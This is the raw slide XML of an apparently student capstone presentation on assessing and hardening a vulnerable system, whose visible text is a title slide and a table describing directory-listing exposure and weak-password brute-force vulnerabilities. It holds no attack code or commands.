      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Google Shape;48;p6"/>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49" name="Google Shape;49;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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50" name="Google Shape;50;p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r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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52" name="Google Shape;52;p6"/>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50. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;p5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1003" name="Google Shape;1003;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="91440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1005" name="Google Shape;1005;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="45330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57. The End">
  <p:cSld name="CUSTOM_7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1006"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1007" name="Google Shape;1007;p52"/>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008" name="Google Shape;1008;p52"/>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a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048599" y="496138"/>
            <a:ext cx="5046801" cy="4151226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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51. Take a Break 1">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p5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pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191749"/>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6. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p7"/>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55" name="Google Shape;55;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100"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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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56" name="Google Shape;56;p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57" name="Google Shape;57;p7"/>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7. Text Only">
  <p:cSld name="CUSTOM_2_7_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 58"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p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 name="Google Shape;60;p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1" name="Google Shape;61;p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2" name="Google Shape;62;p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3" name="Google Shape;63;p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4" name="Google Shape;64;p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 name="Google Shape;65;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="35817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8. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="119" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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 name="Google Shape;69;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="38976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70" name="Google Shape;70;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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 name="Google Shape;71;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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 name="Google Shape;72;p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3" name="Google Shape;73;p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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p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5" name="Google Shape;75;p9"/>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9. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p10"/>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78" name="Google Shape;78;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="2430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36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9" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="139" r="149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="2002535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p1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81" name="Google Shape;81;p10"/>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algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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 id="2147483699" r:id="rId52"/>
  </p:sldLayoutIdLst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1"/>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36.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1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1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49.png"/></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56.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018" name="Google Shape;1018;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p54"/>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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Report by: Henry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bartechko</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80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081" name="Google Shape;1081;p6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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p60"/>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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p60"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3124284151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377457" y="1144811"/>
          <a:ext cx="8389086" cy="3806546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DF0E2E5A-1893-4115-BEBC-C7BC51BD71B3}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2796362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2796362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2796362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="376606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1002476">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-548: Exposure of Information Through Directory Listing</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" i="0" dirty="0">
                        <a:latin typeface="Roboto"/>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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto"/>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DBD9E8"/>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100" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Exposing the contents of a directory can lead to an attacker gaining access to useful information for the attacker to devise exploits.</a:t>
                      </a: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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1144361">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute Force Attack</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak/Non-complex Passwords</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
